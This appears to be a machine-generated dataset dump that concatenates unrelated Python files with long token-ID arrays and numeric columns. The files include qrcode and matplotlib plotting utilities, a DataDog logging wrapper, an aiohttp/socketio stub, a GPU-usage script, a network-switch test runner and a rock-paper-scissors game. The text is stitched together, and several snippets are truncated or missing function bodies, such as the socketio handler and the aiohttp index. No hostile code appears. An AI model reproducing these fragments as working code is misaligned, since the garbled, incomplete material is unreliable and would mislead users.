func_input_path = IO_visutils_path / 'vis_preds_with_clipping' / 'inputs'
clipping_results_path = func_input_path / 'clipping_files'
clipping_results_path.mkdir(parents=True, exist_ok=True)
row_count = 100
tag_names = ['XXX']
id2name = {'XXX': 'XXX_name'}
channel_count = 1
input_data_freq = '10S'
output_data_freq = '270min'
file_properties_df = mock_data.mock_file_properties_df(row_count,region_location_count=1)
# selected_location_ids = list(set(file_properties_df.locationId.values))
region_location = zip(list(file_properties_df.region.values),
list(file_properties_df.locationId.values))
region_location = list(set(region_location))
fill_value_func = ones
for tag_name in tag_names:
resulting_output_file_paths = mock_data.mock_results_4input_files(
file_properties_df,
fill_value_func,
func_input_path,
results_tag_id=tag_name,
channel_count=channel_count,
)
del resulting_output_file_paths
cmap = pl.cm.tab10
a_cmap = cmap
my_cmaps = visutils.add_normal_dist_alpha(a_cmap)
for region, location_id in region_location[0:1]:
print(region, location_id)
file_prop_df_filtered = file_properties_df[file_properties_df.region ==
region]
file_prop_df_filtered = file_properties_df[file_properties_df.locationId
== location_id]
region_location_name = '-'.join([region, location_id])
_ = mock_data.mock_clipping_results_dict_file(
file_prop_df_filtered,
region_location_name,
clipping_results_path,
)
visutils.vis_preds_with_clipping(region,
location_id,
file_prop_df_filtered,
input_data_freq,
output_data_freq,
tag_names,
my_cmaps,
func_input_path,
clipping_results_path,
func_output_path,
id2name,
clipping_threshold=1.0)
| [
37811,
51,
3558,
329,
1490,
26791,
13,
9078,
37811,
198,
11748,
277,
2518,
400,
392,
1754,
26,
277,
2518,
400,
392,
1754,
13,
21633,
3419,
198,
11748,
269,
21370,
198,
11748,
4818,
8079,
198,
11748,
4423,
346,
198,
198,
2,
6738,
2603,... | 2.068155 | 3,448 |
from aiohttp import web
import socketio
# creates a new Async Socket IO Server
sio = socketio.AsyncServer()
# Creates a new Aiohttp Web Application
app = web.Application()
# Binds our Socket.IO server to our Web App
# instance
sio.attach(app)
# we can define aiohttp endpoints just as we normally
# would with no change
# If we wanted to create a new websocket endpoint,
# use this decorator, passing in the name of the
# event we wish to listen out for
@sio.on('message')
# We bind our aiohttp endpoint to our app
# router
app.router.add_get('/', index)
# We kick off our server
if __name__ == '__main__':
web.run_app(app) | [
6738,
257,
952,
4023,
1330,
3992,
201,
198,
11748,
17802,
952,
201,
198,
201,
198,
2,
8075,
257,
649,
1081,
13361,
47068,
24418,
9652,
201,
198,
82,
952,
796,
17802,
952,
13,
42367,
10697,
3419,
201,
198,
2,
7921,
274,
257,
649,
317... | 2.92 | 225 |
"""Compatibility functions for DataDog integrations.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import six
from datadog import api, statsd
from requests.exceptions import HTTPError
from .utils import init_datadog
logger = logging.getLogger(__name__)
def create_event(title, fmt_text, priority='low', text_args=(),
alert_level='info', **kwargs):
"""Create a DataDog Event.
:type title: str
:param title: The event title for DataDog.
:type fmt_text: str
:param fmt_text: The pre-formatted text string. Send in the format string
and text args for logging. This must be % formatted.
:type aggregation_key: str
:param aggregation_key: Aggregate results on DataDog
:type priority: str
:param priority: "low", "normal"
:type text_args: tuple
:param text_args: The tuple of text args for fmt_text
:type alert_level: str
:param alert_level: "error", "warning", "info", or "success"
"""
if init_datadog():
try:
create_kwargs = {
'title': title,
'text': fmt_text % text_args,
'priority': priority,
'alert_level': alert_level,
}
create_kwargs.update(kwargs)
api.Event.create(**create_kwargs)
except HTTPError as exc:
logger.error('Error occurred connecting to DataDog: %s',
six.text_type(exc))
logger.log(alert_level, fmt_text, *text_args)
except Exception as exc:
logger.error('An unknown error occurred in event: %s',
six.text_type(exc))
else:
logger.log(loglevel(alert_level), fmt_text, *text_args)
def create_gauge(title, value, tags=None, sample_rate=1):
"""Create a statsd gauge event for DataDog.
:type title: str
:param title: The metric to track
:type value: numeric
:param value: The value of the metric
:type tags: list
:param tags: The tags to attach to the metric for analysis
:type sample_rate: int
:param sample_rate:
"""
if init_datadog():
try:
statsd.gauge(metric=title, value=value, tags=tags,
sample_rate=sample_rate)
except HTTPError as exc:
logger.error('DataDog returned error calling statsd %s',
six.text_type(exc))
except Exception as exc:
logger.error('An unknown error occurred in gauge: %s',
six.text_type(exc))
else:
log_msg = '{}: %d'.format(title)
logger.info(log_msg, value)
def create_increment(metric, **kwargs):
"""Create a statsd increment event for DataDog.
:type metric: str
:param metric: The metric to increment
"""
if init_datadog():
try:
statsd.increment(metric, **kwargs)
except HTTPError as exc:
logger.error('DataDog returned error calling statsd %s',
six.text_type(exc))
except Exception as exc:
logger.error('An unknown error occurred in gauge: %s',
six.text_type(exc))
else:
log_msg = '{}: %d'.format(metric)
logger.info(log_msg)
def loglevel(log_level):
"""Return the log-level for the logging module.
:type log_level: str
:param log_level: The log-level string
:returns: int
"""
levels = {
'info': logging.INFO,
'error': logging.ERROR,
'warning': logging.WARNING,
'success': logging.INFO,
}
return levels[log_level]
| [
37811,
7293,
25901,
5499,
329,
6060,
32942,
4132,
9143,
13,
198,
37811,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
3601,
62,
8818,
11,
28000,
1098,
62,
17201,
874,
198,
198,
11748,
18931,
198,
11748,
2237,
198,
198,
6738,
... | 2.284381 | 1,607 |
#!/usr/bin/env python
#example taken from https://pypi.python.org/pypi/uncertainties/3.0.1
from uncertainties import ufloat
x = ufloat(2, 0.25)
print x
square = x**2 # Transparent calculations
print square
print square.nominal_value
print square.std_dev # Standard deviation
print square - x*x
from uncertainties.umath import * # sin(), etc.
print sin(1+x**2)
print (2*x+1000).derivatives[x] # Automatic calculation of derivatives
from uncertainties import unumpy # Array manipulation
random_vars = unumpy.uarray([1, 2], [0.1, 0.2])
print random_vars
print random_vars.mean()
print unumpy.cos(random_vars)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
2,
20688,
2077,
422,
3740,
1378,
79,
4464,
72,
13,
29412,
13,
2398,
14,
79,
4464,
72,
14,
19524,
1425,
4278,
14,
18,
13,
15,
13,
16,
198,
6738,
36553,
1330,
334,
22468,
198,
... | 2.970874 | 206 |
import torch
from backend.services.entity_extraction.application.ai.settings import Settings
| [
11748,
28034,
198,
6738,
30203,
13,
30416,
13,
26858,
62,
2302,
7861,
13,
31438,
13,
1872,
13,
33692,
1330,
16163,
628
] | 4.47619 | 21 |
import matplotlib.pyplot as plt
import numpy as np
from structure_factor.utils import _bin_statistics, _sort_vectors
# plot functions
def plot_poisson(x, axis, c="k", linestyle=(0, (5, 10)), label="Poisson"):
r"""Plot the pair correlation function :math:`g_{poisson}` and the structure factor :math:`S_{poisson}` corresponding to the Poisson point process.
Args:
x (numpy.ndarray): x coordinate.
axis (plt.Axes): Axis on which to add the plot.
c (str, optional): Color of the plot. see `matplotlib <https://matplotlib.org/2.1.1/api/_as_gen/matplotlib.pyplot.plot.html>`_ . Defaults to "k".
linestyle (tuple, optional): Linstyle of the plot. see `linestyle <https://matplotlib.org/stable/gallery/lines_bars_and_markers/linestyles.html>`_. Defaults to (0, (5, 10)).
label (regexp, optional): Label of the plot. Defaults to "Poisson".
Returns:
plt.Axes: Plot of the pair correlation function and the structure factor of the Poisson point process over ``x``.
"""
axis.plot(x, np.ones_like(x), c=c, linestyle=linestyle, label=label)
return axis
def plot_summary(
x,
y,
axis,
scale="log",
label=r"mean $\pm$ 3 $\cdot$ std",
fmt="b",
ecolor="r",
**binning_params
):
r"""Loglog plot the summary results of :py:func:`~structure_factor.utils._bin_statistics` i.e., means and errors bars (3 standard deviations).
Args:
x (numpy.ndarray): x coordinate.
y (numpy.ndarray): y coordinate.
axis (plt.Axes): Axis on which to add the plot.
label (regexp, optional): Label of the plot. Defaults to r"mean $\pm$ 3 $\cdot$ std".
Returns:
plt.Axes: Plot of the results of :py:meth:`~structure_factor.utils._bin_statistics` applied on ``x`` and ``y`` .
"""
bin_centers, bin_mean, bin_std = _bin_statistics(x, y, **binning_params)
axis.plot(bin_centers, bin_mean, "b.")
axis.errorbar(
bin_centers,
bin_mean,
yerr=3 * bin_std, # 3 times the standard deviation
fmt=fmt,
lw=1,
ecolor=ecolor,
capsize=3,
capthick=1,
label=label,
zorder=4,
)
axis.legend(loc=4, framealpha=0.2)
axis.set_yscale(scale)
axis.set_xscale(scale)
return axis
def plot_exact(x, y, axis, label):
r"""Loglog plot of a callable function ``y`` evaluated on the vector ``x``.
Args:
x (numpy.ndarray): x coordinate.
y (numpy.ndarray): y coordinate.
axis (plt.Axes): Axis on which to add the plot.
label (regexp, optional): Label of the plot.
Returns:
plt.Axes: Plot of ``y`` with respect to ``x``.
"""
x, y, _ = _sort_vectors(x, y)
axis.plot(x, y, "g", label=label)
return axis
def plot_approximation(
x, y, axis, rasterized, label, color, linestyle, marker, markersize, scale="log"
):
r"""Loglog plot of ``y`` w.r.t. ``x``.
Args:
x (numpy.ndarray): x coordinate.
y (numpy.ndarray): y coordinate.
axis (plt.Axes): Axis on which to add the plot.
rasterized (bool): Rasterized option of `matlplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html#:~:text=float-,rasterized,-bool>`_.
label (regexp, optional): Label of the plot.
color (matplotlib.color): Color of the plot. see `color <https://matplotlib.org/2.1.1/api/_as_gen/matplotlib.pyplot.plot.html>`_ .
linestyle (tuple): Style of the plot. see `linestyle <https://matplotlib.org/stable/gallery/lines_bars_and_markers/linestyles.html>`_.
marker (matplotlib.marker): Marker of `marker <https://matplotlib.org/stable/api/markers_api.html>`_.
markersize (float): Marker size.
scale(str, optional): Trigger between plot scales of `plt.Axes <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_. Defaults to `log`.
Returns:
plt.Axes: Loglog plot of ``y`` w.r.t. ``x``
"""
axis.plot(
x,
y,
color=color,
linestyle=linestyle,
marker=marker,
label=label,
markersize=markersize,
rasterized=rasterized,
)
axis.set_yscale(scale)
axis.set_xscale(scale)
return axis
def plot_estimation_showcase(
k_norm,
estimation,
axis=None,
scale="log",
exact_sf=None,
error_bar=False,
label=r"$\widehat{S}$",
rasterized=True,
file_name="",
**binning_params
):
r"""Loglog plot of the results of the scattering intensity :py:meth:`~structure_factor.structure_factor.StructureFactor.scattering_intensity`, with the means and error bars over specific number of bins found via :py:func:`~structure_factor.utils._bin_statistics`.
Args:
k_norm (numpy.ndarray): Wavenumbers.
estimation (numpy.ndarray): Scattering intensity corresponding to ``k_norm``.
axis (plt.Axes, optional): Axis on which to add the plot. Defaults to None.
scale(str, optional): Trigger between plot scales of `matplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_. Defaults to `log`.
exact_sf (callable, optional): Structure factor of the point process. Defaults to None.
error_bar (bool, optional): If ``True``, ``k_norm`` and correspondingly ``estimation`` are divided into sub-intervals (bins). Over each bin, the mean and the standard deviation of ``estimation`` are derived and visualized on the plot. Note that each error bar corresponds to the mean +/- 3 standard deviation. To specify the number of bins, add it to the kwargs argument ``binning_params``. For more details see :py:meth:`~structure_factor.utils._bin_statistics`. Defaults to False.
rasterized (bool, optional): Rasterized option of `matlplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html#:~:text=float-,rasterized,-bool>`_. Defaults to True.
file_name (str, optional): Name used to save the figure. The available output formats depend on the backend being used. Defaults to "".
"""
k_norm = k_norm.ravel()
estimation = estimation.ravel()
if axis is None:
_, axis = plt.subplots(figsize=(8, 6))
plot_approximation(
k_norm,
estimation,
axis=axis,
label=label,
color="grey",
linestyle="",
marker=".",
markersize=1.5,
rasterized=rasterized,
scale=scale,
)
plot_poisson(k_norm, axis=axis)
if error_bar:
plot_summary(k_norm, estimation, axis=axis, scale=scale, **binning_params)
if exact_sf is not None:
plot_exact(k_norm, exact_sf(k_norm), axis=axis, label=r"Exact $S(\mathbf{k})$")
axis.set_xlabel(r"Wavenumber ($||\mathbf{k}||$)")
axis.set_ylabel(r"Structure factor ($S(\mathbf{k})$)")
axis.legend(loc=4, framealpha=0.2)
if file_name:
fig = axis.get_figure()
fig.savefig(file_name, bbox_inches="tight")
return axis
def plot_estimation_imshow(k_norm, si, axis, file_name):
r"""Color level 2D plot, centered on zero.
Args:
k_norm (numpy.ndarray): Wavenumbers.
si (numpy.ndarray): Scattering intensity corresponding to ``k_norm``.
axis (plt.Axes): Axis on which to add the plot.
file_name (str, optional): Name used to save the figure. The available output formats depend on the backend being used. Defaults to "".
"""
if axis is None:
_, axis = plt.subplots(figsize=(14, 8))
if len(k_norm.shape) < 2:
raise ValueError(
"the scattering intensity should be evaluated on a meshgrid or choose plot_type = 'plot'. "
)
else:
log_si = np.log10(si)
m, n = log_si.shape
m /= 2
n /= 2
f_0 = axis.imshow(
log_si,
extent=[-n, n, -m, m],
cmap="PRGn",
)
plt.colorbar(f_0, ax=axis)
# axis.title.set_text("Scattering intensity")
if file_name:
fig = axis.get_figure()
fig.savefig(file_name, bbox_inches="tight")
return axis
def plot_estimation_all(
point_pattern,
k_norm,
estimation,
exact_sf=None,
error_bar=False,
label=r"$\widehat{S}$",
rasterized=True,
file_name="",
window_res=None,
scale="log",
**binning_params
):
r"""Construct 3 subplots: point pattern, associated scattering intensity plot, associated scattering intensity color level (only for 2D point processes).
Args:
point_pattern (:py:class:`~structure_factor.point_pattern.PointPattern`): Object of type PointPattern containing a realization ``point_pattern.points`` of a point process, the window where the points were simulated ``point_pattern.window`` and (optionally) the intensity of the point process ``point_pattern.intensity``.
k_norm (numpy.ndarray): Wavenumbers.
estimation (numpy.ndarray): Scattering intensity corresponding to ``k_norm``.
exact_sf (callable, optional): Structure factor of the point process. Defaults to None.
error_bar (bool, optional): If ``True``, ``k_norm`` and correspondingly ``estimation`` are divided into sub-intervals (bins). Over each bin, the mean and the standard deviation of ``estimation`` are derived and visualized on the plot. Note that each error bar corresponds to the mean +/- 3 standard deviation. To specify the number of bins, add it to the kwargs argument ``binning_params``. For more details see :py:meth:`~structure_factor.utils._bin_statistics`. Defaults to False.
rasterized (bool, optional): Rasterized option of `matlplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html#:~:text=float-,rasterized,-bool>`_. Defaults to True.
file_name (str, optional): Name used to save the figure. The available output formats depend on the backend being used. Defaults to "".
window_res (:py:class:`~structure_factor.spatial_windows.AbstractSpatialWindow`, optional): New restriction window. It is useful when the sample of points is large, so for time and visualization purposes, it is better to restrict the plot of the point process to a smaller window. Defaults to None.
scale(str, optional): Trigger between plot scales of `matplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_. Defaults to `log`.
"""
figure, axes = plt.subplots(1, 3, figsize=(24, 6))
point_pattern.plot(axis=axes[0], window=window_res)
plot_estimation_showcase(
k_norm,
estimation,
axis=axes[1],
exact_sf=exact_sf,
error_bar=error_bar,
label=label,
rasterized=rasterized,
file_name="",
scale=scale,
**binning_params,
)
plot_estimation_imshow(k_norm, estimation, axes[2], file_name="")
if file_name:
figure.savefig(file_name, bbox_inches="tight")
return axes
def plot_sf_hankel_quadrature(
k_norm,
estimation,
axis,
scale,
k_norm_min,
exact_sf,
color,
error_bar,
label,
file_name,
**binning_params
):
r"""Plot the approximations of the structure factor (results of :py:meth:`~structure_factor.structure_factor.StructureFactor.quadrature_estimator_isotropic`) with means and error bars over bins, see :py:meth:`~structure_factor.utils._bin_statistics`.
Args:
k_norm (numpy.ndarray): Vector of wavenumbers (i.e., norms of waves) on which the structure factor has been approximated.
estimation (numpy.ndarray): Approximation of the structure factor corresponding to ``k_norm``.
axis (plt.Axes): Support axis of the plots.
scale(str): Trigger between plot scales of `matplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_.
k_norm_min (float): Estimated lower bound of the wavenumbers (only when ``estimation`` was approximated using **Ogata quadrature**).
exact_sf (callable): Theoretical structure factor of the point process.
error_bar (bool): If ``True``, ``k_norm`` and correspondingly ``si`` are divided into sub-intervals (bins). Over each bin, the mean and the standard deviation of ``si`` are derived and visualized on the plot. Note that each error bar corresponds to the mean +/- 3 standard deviation. To specify the number of bins, add it to the kwargs argument ``binning_params``. For more details see :py:meth:`~structure_factor.utils._bin_statistics`. Defaults to False.
file_name (str): Name used to save the figure. The available output formats depend on the backend being used.
label (regexp): Label of the plot.
Keyword Args:
binning_params: (dict): Used when ``error_bar=True``, by the method :py:meth:`~structure_factor.utils_bin_statistics` as keyword arguments (except ``"statistic"``) of ``scipy.stats.binned_statistic``.
"""
if axis is None:
fig, axis = plt.subplots(figsize=(8, 5))
plot_approximation(
k_norm,
estimation,
axis=axis,
label=label,
marker=".",
linestyle="",
color=color,
markersize=4,
scale=scale,
rasterized=False,
)
if exact_sf is not None:
plot_exact(k_norm, exact_sf(k_norm), axis=axis, label=r"Exact $S(k)$")
if error_bar:
plot_summary(k_norm, estimation, axis=axis, scale=scale, **binning_params)
plot_poisson(k_norm, axis=axis)
if k_norm_min is not None:
sf_interpolate = interpolate.interp1d(
k_norm, estimation, axis=0, fill_value="extrapolate", kind="cubic"
)
axis.loglog(
k_norm_min,
sf_interpolate(k_norm_min),
"ro",
label=r"$k_{min}$",
)
axis.legend()
axis.set_xlabel(r"Wavenumber ($k$)")
axis.set_ylabel(r"Structure factor ($S(k)$)")
plt.show()
if file_name:
fig = axis.get_figure()
fig.savefig(file_name, bbox_inches="tight")
return axis
| [
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
4645,
62,
31412,
13,
26791,
1330,
4808,
8800,
62,
14269,
3969,
11,
4808,
30619,
62,
303,
5217,
198,
198,
2,
7110,
5499,
628,
... | 2.48519 | 5,672 |
import unittest
if __name__ == '__main__':
from test.test_pyswitch.test_interface_OverlayGateway import \
InterfaceOverlayGatewayTestCase
from test.test_pyswitch.test_interface_vrf import InterfaceVRFTestCase
from test.test_pyswitch.test_interface_pvlan import \
InterfacePrivateVlanTestCase
from test.test_pyswitch.test_interface_evpn import InterfaceEVPNTestCase
from test.test_pyswitch.test_interface_virtual_port import \
InterfaceVirtualPortTestCase
from test.test_pyswitch.test_interface_port_channel import \
InterfacePortChannelCase
from test.test_pyswitch.test_interface_SwitchPort import \
InterfaceSwitchPort
from test.test_pyswitch.test_interface import InterfaceGenericCase
from test.test_pyswitch.test_device import DeviceTestCase
from test.test_pyswitch.test_fabric_service import FabricServiceTestCase
from test.test_pyswitch.test_lldp import LLDPTestCase
device = unittest.TestLoader().loadTestsFromTestCase(DeviceTestCase)
fs = unittest.TestLoader().loadTestsFromTestCase(FabricServiceTestCase)
lldp = unittest.TestLoader().loadTestsFromTestCase(LLDPTestCase)
# interface related
vrf = unittest.TestLoader().loadTestsFromTestCase(InterfaceVRFTestCase)
ovg = unittest.TestLoader().loadTestsFromTestCase(
InterfaceOverlayGatewayTestCase)
pvlan = unittest.TestLoader().loadTestsFromTestCase(
InterfacePrivateVlanTestCase)
evpn = unittest.TestLoader().loadTestsFromTestCase(InterfaceEVPNTestCase)
generic = unittest.TestLoader().loadTestsFromTestCase(
InterfaceGenericCase)
vp = unittest.TestLoader().loadTestsFromTestCase(
InterfaceVirtualPortTestCase)
portChannel = unittest.TestLoader().loadTestsFromTestCase(
InterfacePortChannelCase)
swp = unittest.TestLoader().loadTestsFromTestCase(InterfaceSwitchPort)
alltests = unittest.TestSuite([
device,
fs,
lldp,
vrf,
generic,
portChannel,
ovg,
pvlan,
swp,
evpn,
vp
])
unittest.TextTestRunner(verbosity=2, failfast=False).run(alltests)
| [
11748,
555,
715,
395,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
422,
1332,
13,
9288,
62,
79,
893,
42248,
13,
9288,
62,
39994,
62,
5886,
10724,
22628,
1014,
1330,
3467,
198,
220,
220,
220... | 2.614183 | 832 |
import os.path as op
import re
import sys
from toolshed import reader, nopen
from collections import defaultdict
import numpy as np
from itertools import cycle
import pylab as pl
import seaborn
colors = cycle(seaborn.color_palette('Set1', 8))
BASES = False
FLAGS="-F%i" % (0x4 | 0x100 | 0x200)
if __name__ == "__main__":
import argparse
p = argparse.ArgumentParser()
p.add_argument("--reads", help="reads file", required=True)
p.add_argument("bams", nargs="+")
a = p.parse_args()
main(a.bams, reads=a.reads)
| [
11748,
28686,
13,
6978,
355,
1034,
198,
11748,
302,
198,
11748,
25064,
198,
6738,
4899,
704,
1330,
9173,
11,
299,
9654,
198,
6738,
17268,
1330,
4277,
11600,
198,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
340,
861,
10141,
1330,
6772... | 2.603865 | 207 |
# -*- coding:utf-8 -*-
from Arya.backends.base_module import BaseSaltModule | [
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
6738,
39477,
64,
13,
1891,
2412,
13,
8692,
62,
21412,
1330,
7308,
43061,
26796
] | 2.777778 | 27 |
from atlas import *
from ..support import *
from .bpred import BranchPredictor
from .btb import BranchTargetBuffer
from .ras import ReturnAddressStack
@Module
def IFetchStage():
"""IFetch Stage
TODO: Documentation
"""
io = Io({
'pc': Input(Bits(C['core-width'])),
'mispred': Input(mispred_bundle),
'ras_ctrl': Input(ras_ctrl_bundle),
'next_pc': Output(Bits(C['core-width'])),
'if1_if2': Output(if_bundle)
})
bpred = Instance(BranchPredictor())
btb = Instance(BranchTargetBuffer())
ras = Instance(ReturnAddressStack())
ras.ctrl <<= io.ras_ctrl
next_pc = Wire(Bits(C['paddr-width']))
if1_pc = Wire(Bits(C['paddr-width']))
btb.cur_pc <<= next_pc
bpred.cur_pc <<= next_pc
#
# Misprediction Update Handling
#
btb.update.valid <<= io.mispred.valid
btb.update.pc <<= io.mispred.pc
btb.update.target <<= io.mispred.target
btb.update.is_return <<= io.mispred.is_return
bpred.update.valid <<= io.mispred.valid
bpred.update.pc <<= io.mispred.pc
bpred.update.taken <<= io.mispred.taken
#
# The predicted next PC comes from either the next sequential PC or the
# predicted target address in the BTB. Note that pred_pc _can_ be wrong and
# that's ok because the misspeculation will be caught later in the pipeline.
#
if1_pc <<= io.pc
with bpred.pred.taken & btb.pred.valid & ~btb.pred.is_return:
if1_pc <<= btb.pred.target
with btb.pred.valid & btb.pred.is_return:
if1_pc <<= ras.top
#
# The actual next PC is either the prediction, a value from the return
# address stack (RAS) or the correct PC (correction from a misspeculation).
#
with io.mispred.valid:
next_pc <<= io.mispred.target
with otherwise:
next_pc <<= if1_pc + 4
io.next_pc <<= next_pc
io.if1_if2.valid <<= True
io.if1_if2.pc <<= if1_pc
NameSignals(locals()) | [
6738,
379,
21921,
1330,
1635,
198,
6738,
11485,
11284,
1330,
1635,
198,
198,
6738,
764,
65,
28764,
1330,
20551,
47,
17407,
273,
198,
6738,
764,
18347,
65,
1330,
20551,
21745,
28632,
198,
6738,
764,
8847,
1330,
8229,
20231,
25896,
198,
1... | 2.312132 | 849 |
import typing
from coincurve import PrivateKey
from pytest import fixture, raises
from nekoyume.block import Block
from nekoyume.exc import InvalidMoveError
from nekoyume.move import (
CreateNovice,
HackAndSlash,
LevelUp,
Move,
Say,
Sleep,
)
from nekoyume.user import User
@fixture
| [
11748,
19720,
198,
198,
6738,
11194,
333,
303,
1330,
15348,
9218,
198,
6738,
12972,
9288,
1330,
29220,
11,
12073,
198,
198,
6738,
497,
74,
726,
2454,
13,
9967,
1330,
9726,
198,
6738,
497,
74,
726,
2454,
13,
41194,
1330,
17665,
21774,
... | 2.747826 | 115 |
import os
import re
__all__=['get_user','gpu_usage','check_empty','get_info']
def get_user(pid):
'''
get_user(pid)
Input a pid number , return its creator by linux command ps
'''
ps=os.popen('ps -eo pid,user|grep '+str(pid))
lines=ps.readlines()
for line in lines:
return re.split('[ \n]',line)[-2]
return None
def gpu_usage():
'''
gpu_usage()
return two lists. The first list contains usage percent of every GPU. The second list contains the memory used of every GPU. The information is obtained by command 'nvidia-smi'
'''
pid_current,percent,memory,gpu_used=get_info()
return percent,memory
def check_empty():
'''
check_empty()
return a list containing all GPU ids that no process is using currently.
'''
gpu_unused=list()
pid_current,percent,memory,gpu_used=get_info()
for i in range(0,len(percent)):
if not i in gpu_used:
gpu_unused.append(i)
if len(gpu_unused)==0:
return None
else:
return (gpu_unused)
def get_users(gpu_id):
'''
return a dict {user1:mem1,user2:mem2} on GPU with id gpu_id
'''
ns=os.popen('nvidia-smi')
lines_ns=ns.readlines()
users_dict=dict()
for line in lines_ns:
#if line.find('%')==-1 and line.find('MiB')!=-1:
if 'MiB' in line:
arrs=re.split('[ ]+',line)
g_id=arrs[1]
if not int(g_id)==gpu_id:
continue
pid=arrs[2]
mem=int(line.split('MiB')[0][-5:])
user=get_user(pid)
if user in users_dict.keys():
users_dict[user]=mem+users_dict[user]
else:
users_dict[user]=mem
return users_dict
def get_info():
'''
pid_list,percent,memory,gpu_used=get_info()
return a dict and three lists. pid_list has pids as keys and gpu ids as values, showing which gpu the process is using
'''
gpu_used=list()
pid_current=list()
ns=os.popen('nvidia-smi')
lines_ns=ns.readlines()
percent=list()
memory=list()
pid_list=dict()
for line in lines_ns:
if line.find('%')!=-1:
percent.append(int(line.split('%')[-2][-3:]))
memory.append(int(line.split('MiB')[0][-5:]))
if line.find('%')==-1 and line.find('MiB')!=-1:
#processes
arrs=re.split('[ ]+',line)
gpu_id=arrs[1]
pid=arrs[2]
process_name=arrs[4]
gpu_used.append(int(gpu_id))
mem=int(arrs[-2][:-3])
if pid in pid_list.keys():
pid_list[pid].append(gpu_id)
else:
pid_list[pid]=list()
pid_list[pid].append(gpu_id)
pid_current=pid_list.keys()
gpu_used=list(set(gpu_used))
return pid_list,percent,memory,gpu_used
if __name__=="__main__":
print(get_info())
| [
11748,
28686,
198,
11748,
302,
198,
834,
439,
834,
28,
17816,
1136,
62,
7220,
41707,
46999,
62,
26060,
41707,
9122,
62,
28920,
41707,
1136,
62,
10951,
20520,
198,
4299,
651,
62,
7220,
7,
35317,
2599,
198,
220,
220,
220,
705,
7061,
198... | 2.003448 | 1,450 |
"""
`````````````````
Run it:
.. code:: bash
$ pip install qrcode-converter
$ python app/run.py [inner_img_path] [content] [width] [height]
Links
`````
* `website <https://github.com/jackqt/py-qrcode-generator/>`_
* `documentation <https://github.com/jackqt/py-qrcode-generator/>`_
"""
import re
import ast
from setuptools import setup
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('app/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='qrcode-converter',
version=version,
url='https://github.com/jackqt/py-qrcode-generator/',
license='MIT',
author='Jack Li',
author_email='jack.qingtian@gmail.com',
description='A qrcode generator with inner image',
long_description=__doc__,
packages=['app'],
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'Pillow>=4.0.0',
'qrcode>=5.3'
],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| [
37811,
198,
33153,
33153,
33153,
33153,
63,
198,
10987,
340,
25,
198,
198,
492,
2438,
3712,
27334,
628,
220,
220,
220,
720,
7347,
2721,
10662,
6015,
1098,
12,
1102,
332,
353,
198,
220,
220,
220,
720,
21015,
598,
14,
5143,
13,
9078,
... | 2.469325 | 652 |
import unittest
from .palindrome_number import Solution
| [
11748,
555,
715,
395,
198,
6738,
764,
18596,
521,
5998,
62,
17618,
1330,
28186,
628
] | 3.8 | 15 |
from django.db import models
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
198
] | 3.625 | 8 |
from random import randint
from time import sleep
itens = ('Pedra', 'Papel','Tesoura')
computador = randint(0, 2)
print('''\033[1;31mSuas opções\033[m:
[ 0 ] PEDRA
[ 1 ] PAPEL
[ 2 ] TESOURA''')
jogador = int(input('\033[1;34mQual é a sua Jogada?\033[m '))
print('\033[1;30mJO\033[m')
sleep(1)
print('\033[1;34mKEN\033[m')
sleep(1)
print('\033[1;33mPO!!\033[m')
sleep(1)
print('\033[35m-=\033[m' * 11)
print('\033[1;32mComputador jogou\033[m ' ' \033[1;35m{}\033[m'.format(itens[computador]))
print('\033[1;36mJogador jogou\033[m ' ' \033[1;32m{}\033[m'. format(itens[jogador]))
print('\033[35m-=\033[m' * 11)
if computador == 0:# computador jogou PEDRA
if jogador == 0:
print('\033[1;37mEMPATE\033[m')
elif jogador == 1:
print('\033[1;43mJOGADOR VENCEU\033[m')
elif jogador == 2:
print('\033[1;31mCOMPUTADOR VENCEU\033[m')
else:
print('\033[4;33;40mJOGADA INVÁLIDA\033[m!')
elif computador == 1: # computador jogou PAPEL
if jogador == 0:
print('\033[1;31mCOMPUTADOR VENCEU\033[m')
elif jogador == 1:
print('\033[1;37mEMPATE\033[m')
elif jogador == 2:
print('\033[1;34mJOGADOR VENCEU\033[m')
else:
print('\033[4;33;;40mJOGADA INVÁLIDA\033[m!')
elif computador == 2: # computador jogou TESOURA
if jogador == 0:
print('\033[1;34mJOGADOR VENCEU\033[m')
elif jogador == 1:
print('\033[1;31mCOMPUTADOR VENCEU\033[m')
elif jogador == 2:
print('\033[1;37mEMPATE\033[m')
else:
print('\033[4;33;mJOGADA INVÁLIDA\033[m!')
| [
6738,
4738,
1330,
43720,
600,
198,
6738,
640,
1330,
3993,
198,
270,
641,
796,
19203,
43468,
430,
3256,
705,
47,
499,
417,
41707,
36504,
280,
430,
11537,
198,
785,
1996,
7079,
796,
43720,
